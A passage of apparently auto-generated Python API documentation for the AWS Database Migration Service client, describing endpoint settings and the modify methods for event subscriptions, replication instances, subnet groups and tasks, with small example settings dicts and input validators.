Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update) or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` s are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
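The S3Settings parameters above can be assembled into a plain dict before being passed to the call. This is a minimal sketch for a compressed Parquet target; the role ARN, bucket name, and folder are placeholders, not real resources:

```python
# A minimal sketch of an S3Settings dict for a Parquet target, using the
# parameters documented above. The ARN and bucket name are placeholders.
s3_settings = {
    "ServiceAccessRoleArn": "arn:aws:iam::123456789012:role/dms-s3-role",
    "BucketName": "my-dms-target-bucket",
    "BucketFolder": "dms-output",     # files land under dms-output/<schema>/<table>/
    "CompressionType": "GZIP",
    "DataFormat": "PARQUET",
    "ParquetVersion": "PARQUET_2_0",
    "EncodingType": "RLE_DICTIONARY",
    "EnableStatistics": True,
    "EncryptionMode": "SSE_S3",
}

# Passing it to the call would then look like (not executed here):
# client.modify_endpoint(EndpointArn=endpoint_arn, S3Settings=s3_settings)
```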
:type DmsTransferSettings: dict
:param DmsTransferSettings:
The settings in JSON format for the DMS transfer type of source endpoint.
Attributes include the following:
* serviceAccessRoleArn - The IAM role that has permission to access the Amazon S3 bucket.
* BucketName - The name of the S3 bucket to use.
* compressionType - An optional parameter to use GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed.
Shorthand syntax: ServiceAccessRoleArn=string ,BucketName=string,CompressionType=string
JSON syntax:
{ \"ServiceAccessRoleArn\": \"string\", \"BucketName\": \"string\", \"CompressionType\": \"none\"|\"gzip\" }
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
:type MongoDbSettings: dict
:param MongoDbSettings:
Settings in JSON format for the source MongoDB endpoint. For more information about the available settings, see the configuration properties section in `Using MongoDB as a Source for AWS Database Migration Service <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Source.MongoDB.html>`__ in the *AWS Database Migration Service User Guide.*
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when ``authType=NO`` .
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be a positive value greater than 0. Default value is 1000.
- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don\'t specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
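A MongoDbSettings dict built from the parameters above might look like the following sketch. The host, credentials, and database names are placeholders; note that ``DocsToInvestigate`` is string-typed in this API:

```python
# A sketch of MongoDbSettings for a source endpoint in table mode, built from
# the parameters documented above. Host, credentials, and database names are
# placeholders.
mongodb_settings = {
    "ServerName": "mongo.example.internal",
    "Port": 27017,
    "DatabaseName": "appdb",
    "AuthType": "PASSWORD",
    "AuthMechanism": "SCRAM_SHA_1",   # recommended for MongoDB 3.x
    "AuthSource": "admin",            # the default auth database
    "Username": "dms_user",
    "Password": "example-password",
    "NestingLevel": "ONE",            # ONE = table mode, NONE = document mode
    "DocsToInvestigate": "1000",      # string-typed in this API
}
```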
:type KinesisSettings: dict
:param KinesisSettings:
Settings in JSON format for the target Amazon Kinesis Data Streams endpoint. For more information about the available settings, see `Using Object Mapping to Migrate Data to a Kinesis Data Stream <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.Kinesis.html#CHAP_Target.Kinesis.ObjectMapping>`__ in the *AWS Database Migration Service User Guide.*
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
:type ElasticsearchSettings: dict
:param ElasticsearchSettings:
Settings in JSON format for the target Elasticsearch endpoint. For more information about the available settings, see `Extra Connection Attributes When Using Elasticsearch as a Target for AWS DMS <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.Elasticsearch.html#CHAP_Target.Elasticsearch.Configuration>`__ in the *AWS Database Migration Service User Guide.*
- **ServiceAccessRoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) used by the service to access the IAM role.
- **EndpointUri** *(string) --* **[REQUIRED]**
The endpoint for the Elasticsearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
:type RedshiftSettings: dict
:param RedshiftSettings:
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use.
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of \'YYYY-MM-DD\'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``\"arn:aws:s3:::*\"`` to use the following actions: ``\"s3:PutObject\", \"s3:ListBucket\"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of chars you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is \"?\".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), \'timeformat_string\', \'epochsecs\', or \'epochmillisecs\'. If this parameter is left unset, it defaults to a format of \'YYYY-MM-DD HH:MI:SS\'. Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
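Pulling the RedshiftSettings parameters above together, a settings dict might be sketched as follows. The cluster endpoint, database, and credentials are placeholders; ``auto`` is chosen for both formats on the assumption that the sample data mixes date and time formats:

```python
# A sketch of RedshiftSettings using the parameters documented above. The
# server name, database, and credentials are placeholders.
redshift_settings = {
    "ServerName": "my-cluster.abc123.us-east-1.redshift.amazonaws.com",
    "Port": 5439,                  # the Redshift default
    "DatabaseName": "warehouse",
    "Username": "dms_user",
    "Password": "example-password",
    "DateFormat": "auto",          # recognizes mixed date formats
    "TimeFormat": "auto",          # recognizes mixed time formats
    "EmptyAsNull": True,
    "TruncateColumns": True,
    "MaxFileSize": 32768,          # KB (the documented default, 32 MB)
    "FileTransferUploadStreams": 10,
}
```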
:rtype: dict
:returns:
"""
pass
def modify_event_subscription(self, SubscriptionName: str, SnsTopicArn: str = None, SourceType: str = None, EventCategories: List = None, Enabled: bool = None) -> Dict:
"""
Modifies an existing AWS DMS event notification subscription.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ModifyEventSubscription>`_
**Request Syntax**
::
response = client.modify_event_subscription(
SubscriptionName='string',
SnsTopicArn='string',
SourceType='string',
EventCategories=[
'string',
],
Enabled=True|False
)
**Response Syntax**
::
{
'EventSubscription': {
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False
}
}
**Response Structure**
- *(dict) --*
- **EventSubscription** *(dict) --*
The modified event subscription.
- **CustomerAwsId** *(string) --*
The AWS customer account associated with the AWS DMS event notification subscription.
- **CustSubscriptionId** *(string) --*
The AWS DMS event notification subscription Id.
- **SnsTopicArn** *(string) --*
The topic ARN of the AWS DMS event notification subscription.
- **Status** *(string) --*
The status of the AWS DMS event notification subscription.
Constraints:
Can be one of the following: creating | modifying | deleting | active | no-permission | topic-not-exist
The status "no-permission" indicates that AWS DMS no longer has permission to post to the SNS topic. The status "topic-not-exist" indicates that the topic was deleted after the subscription was created.
- **SubscriptionCreationTime** *(string) --*
The time the RDS event notification subscription was created.
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | replication-server | security-group | migration-task
- **SourceIdsList** *(list) --*
A list of source Ids for the event subscription.
- *(string) --*
- **EventCategoriesList** *(list) --*
A list of event categories.
- *(string) --*
- **Enabled** *(boolean) --*
Boolean value that indicates if the event subscription is enabled.
:type SubscriptionName: string
:param SubscriptionName: **[REQUIRED]**
The name of the AWS DMS event notification subscription to be modified.
:type SnsTopicArn: string
:param SnsTopicArn:
The Amazon Resource Name (ARN) of the Amazon SNS topic created for event notification. The ARN is created by Amazon SNS when you create a topic and subscribe to it.
:type SourceType: string
:param SourceType:
The type of AWS DMS resource that generates the events you want to subscribe to.
Valid values: replication-instance | migration-task
:type EventCategories: list
:param EventCategories:
A list of event categories for a source type that you want to subscribe to. Use the ``DescribeEventCategories`` action to see a list of event categories.
- *(string) --*
:type Enabled: boolean
:param Enabled:
A Boolean value; set to **true** to activate the subscription.
:rtype: dict
:returns:
"""
pass
def modify_replication_instance(self, ReplicationInstanceArn: str, AllocatedStorage: int = None, ApplyImmediately: bool = None, ReplicationInstanceClass: str = None, VpcSecurityGroupIds: List = None, PreferredMaintenanceWindow: str = None, MultiAZ: bool = None, EngineVersion: str = None, AllowMajorVersionUpgrade: bool = None, AutoMinorVersionUpgrade: bool = None, ReplicationInstanceIdentifier: str = None) -> Dict:
"""
Modifies the replication instance to apply new settings. You can change one or more parameters by specifying these parameters and the new values in the request.
Some settings are applied during the maintenance window.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ModifyReplicationInstance>`_
**Request Syntax**
::
response = client.modify_replication_instance(
ReplicationInstanceArn='string',
AllocatedStorage=123,
ApplyImmediately=True|False,
ReplicationInstanceClass='string',
VpcSecurityGroupIds=[
'string',
],
PreferredMaintenanceWindow='string',
MultiAZ=True|False,
EngineVersion='string',
AllowMajorVersionUpgrade=True|False,
AutoMinorVersionUpgrade=True|False,
ReplicationInstanceIdentifier='string'
)
**Response Syntax**
::
{
'ReplicationInstance': {
'ReplicationInstanceIdentifier': 'string',
'ReplicationInstanceClass': 'string',
'ReplicationInstanceStatus': 'string',
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'AvailabilityZone': 'string',
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'ReplicationInstanceClass': 'string',
'AllocatedStorage': 123,
'MultiAZ': True|False,
'EngineVersion': 'string'
},
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'KmsKeyId': 'string',
'ReplicationInstanceArn': 'string',
'ReplicationInstancePublicIpAddress': 'string',
'ReplicationInstancePrivateIpAddress': 'string',
'ReplicationInstancePublicIpAddresses': [
'string',
],
'ReplicationInstancePrivateIpAddresses': [
'string',
],
'PubliclyAccessible': True|False,
'SecondaryAvailabilityZone': 'string',
'FreeUntil': datetime(2015, 1, 1),
'DnsNameServers': 'string'
}
}
**Response Structure**
- *(dict) --*
- **ReplicationInstance** *(dict) --*
The modified replication instance.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **ReplicationInstanceStatus** *(string) --*
The status of the replication instance.
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **InstanceCreateTime** *(datetime) --*
The time the replication instance was created.
- **VpcSecurityGroups** *(list) --*
The VPC security group for the instance.
- *(dict) --*
- **VpcSecurityGroupId** *(string) --*
The VPC security group Id.
- **Status** *(string) --*
The status of the VPC security group.
- **AvailabilityZone** *(string) --*
The Availability Zone for the instance.
- **ReplicationSubnetGroup** *(dict) --*
The subnet group for the replication instance.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the Availability Zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
- **PreferredMaintenanceWindow** *(string) --*
The maintenance window times for the replication instance.
- **PendingModifiedValues** *(dict) --*
The pending modification values.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **AutoMinorVersionUpgrade** *(boolean) --*
Boolean value indicating if minor version upgrades will be automatically applied to the instance.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstancePublicIpAddress** *(string) --*
The public IP address of the replication instance.
- **ReplicationInstancePrivateIpAddress** *(string) --*
The private IP address of the replication instance.
- **ReplicationInstancePublicIpAddresses** *(list) --*
One or more public IP addresses for the replication instance.
- *(string) --*
- **ReplicationInstancePrivateIpAddresses** *(list) --*
One or more private IP addresses for the replication instance.
- *(string) --*
- **PubliclyAccessible** *(boolean) --*
Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
- **SecondaryAvailabilityZone** *(string) --*
The availability zone of the standby replication instance in a Multi-AZ deployment.
- **FreeUntil** *(datetime) --*
The expiration date of the free replication instance that is part of the Free DMS program.
- **DnsNameServers** *(string) --*
The DNS name servers for the replication instance.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:type AllocatedStorage: integer
:param AllocatedStorage:
The amount of storage (in gigabytes) to be allocated for the replication instance.
:type ApplyImmediately: boolean
:param ApplyImmediately:
Indicates whether the changes should be applied immediately or during the next maintenance window.
:type ReplicationInstanceClass: string
:param ReplicationInstanceClass:
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds:
Specifies the VPC security group to be used with the replication instance. The VPC security group must work with the VPC containing the replication instance.
- *(string) --*
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow:
The weekly time range (in UTC) during which system maintenance can occur, which might result in an outage. Changing this parameter does not result in an outage, except in the following situation, and the change is asynchronously applied as soon as possible. If you move this window to the current time, there must be at least 30 minutes between the current time and the end of the window to ensure that pending changes are applied.
Default: Uses existing setting
Format: ddd:hh24:mi-ddd:hh24:mi
Valid Days: Mon | Tue | Wed | Thu | Fri | Sat | Sun
Constraints: Must be at least 30 minutes
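The format and the 30-minute minimum above can be checked locally before making the call. This is a sketch under the stated constraints; the helper name and wrap-around handling are my own:

```python
import re
from datetime import timedelta

_DAYS = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
# ddd:hh24:mi-ddd:hh24:mi, with the valid day abbreviations listed above.
_WINDOW_RE = re.compile(
    r"^(Mon|Tue|Wed|Thu|Fri|Sat|Sun):([01]\d|2[0-3]):([0-5]\d)"
    r"-(Mon|Tue|Wed|Thu|Fri|Sat|Sun):([01]\d|2[0-3]):([0-5]\d)$"
)

def is_valid_maintenance_window(window: str) -> bool:
    """Check the ddd:hh24:mi-ddd:hh24:mi format and the 30-minute minimum."""
    m = _WINDOW_RE.match(window)
    if not m:
        return False
    start = timedelta(days=_DAYS.index(m.group(1)),
                      hours=int(m.group(2)), minutes=int(m.group(3)))
    end = timedelta(days=_DAYS.index(m.group(4)),
                    hours=int(m.group(5)), minutes=int(m.group(6)))
    duration = end - start
    if duration <= timedelta(0):       # window wraps past Sunday midnight
        duration += timedelta(days=7)
    return duration >= timedelta(minutes=30)
```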
:type MultiAZ: boolean
:param MultiAZ:
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
:type EngineVersion: string
:param EngineVersion:
The engine version number of the replication instance.
:type AllowMajorVersionUpgrade: boolean
:param AllowMajorVersionUpgrade:
Indicates that major version upgrades are allowed. Changing this parameter does not result in an outage and the change is asynchronously applied as soon as possible.
Constraints: This parameter must be set to true when specifying a value for the ``EngineVersion`` parameter that is a different major version than the replication instance\'s current version.
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade:
Indicates that minor version upgrades will be applied automatically to the replication instance during the maintenance window. Changing this parameter does not result in an outage, except in the following case, and the change is asynchronously applied as soon as possible. An outage will result if this parameter is set to ``true`` during the maintenance window, a newer minor version is available, and AWS DMS has enabled auto patching for that engine version.
:type ReplicationInstanceIdentifier: string
:param ReplicationInstanceIdentifier:
The replication instance identifier. This parameter is stored as a lowercase string.
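The identifier constraints listed in the response structure above (1 to 63 alphanumeric characters or hyphens, first character a letter, no trailing or consecutive hyphens) can be sketched as a local check. The pattern and function name are my own, not part of the API:

```python
import re

# Sketch of a check for the ReplicationInstanceIdentifier constraints:
# 1-63 alphanumeric characters or hyphens, first character a letter,
# no trailing hyphen, no two consecutive hyphens.
_INSTANCE_ID_RE = re.compile(r"^[A-Za-z](?:-?[A-Za-z0-9])*$")

def is_valid_instance_identifier(identifier: str) -> bool:
    if not 1 <= len(identifier) <= 63:
        return False
    return bool(_INSTANCE_ID_RE.match(identifier))
```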
:rtype: dict
:returns:
"""
pass
def modify_replication_subnet_group(self, ReplicationSubnetGroupIdentifier: str, SubnetIds: List, ReplicationSubnetGroupDescription: str = None) -> Dict:
"""
Modifies the settings for the specified replication subnet group.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ModifyReplicationSubnetGroup>`_
**Request Syntax**
::
response = client.modify_replication_subnet_group(
ReplicationSubnetGroupIdentifier='string',
ReplicationSubnetGroupDescription='string',
SubnetIds=[
'string',
]
)
**Response Syntax**
::
{
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **ReplicationSubnetGroup** *(dict) --*
The modified replication subnet group.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the Availability Zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
:type ReplicationSubnetGroupIdentifier: string
:param ReplicationSubnetGroupIdentifier: **[REQUIRED]**
The name of the replication instance subnet group.
:type ReplicationSubnetGroupDescription: string
:param ReplicationSubnetGroupDescription:
The description of the replication instance subnet group.
:type SubnetIds: list
:param SubnetIds: **[REQUIRED]**
A list of subnet IDs.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def modify_replication_task(self, ReplicationTaskArn: str, ReplicationTaskIdentifier: str = None, MigrationType: str = None, TableMappings: str = None, ReplicationTaskSettings: str = None, CdcStartTime: datetime = None, CdcStartPosition: str = None, CdcStopPosition: str = None) -> Dict:
"""
Modifies the specified replication task.
You can't modify the task endpoints. The task must be stopped before you can modify it.
For more information about AWS DMS tasks, see `Working with Migration Tasks <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Tasks.html>`__ in the *AWS Database Migration Service User Guide* .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ModifyReplicationTask>`_
**Request Syntax**
::
response = client.modify_replication_task(
ReplicationTaskArn='string',
ReplicationTaskIdentifier='string',
MigrationType='full-load'|'cdc'|'full-load-and-cdc',
TableMappings='string',
ReplicationTaskSettings='string',
CdcStartTime=datetime(2015, 1, 1),
CdcStartPosition='string',
CdcStopPosition='string'
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The replication task that was modified.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position "2018-03-08T12:12:12"
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position "mysql-bin-changelog.000024:373"
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position "server_time:2018-02-09T12:12:12"
Commit time example: --cdc-stop-position "commit_time:2018-02-09T12:12:12"
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task.
:type ReplicationTaskIdentifier: string
:param ReplicationTaskIdentifier:
The replication task identifier.
Constraints:
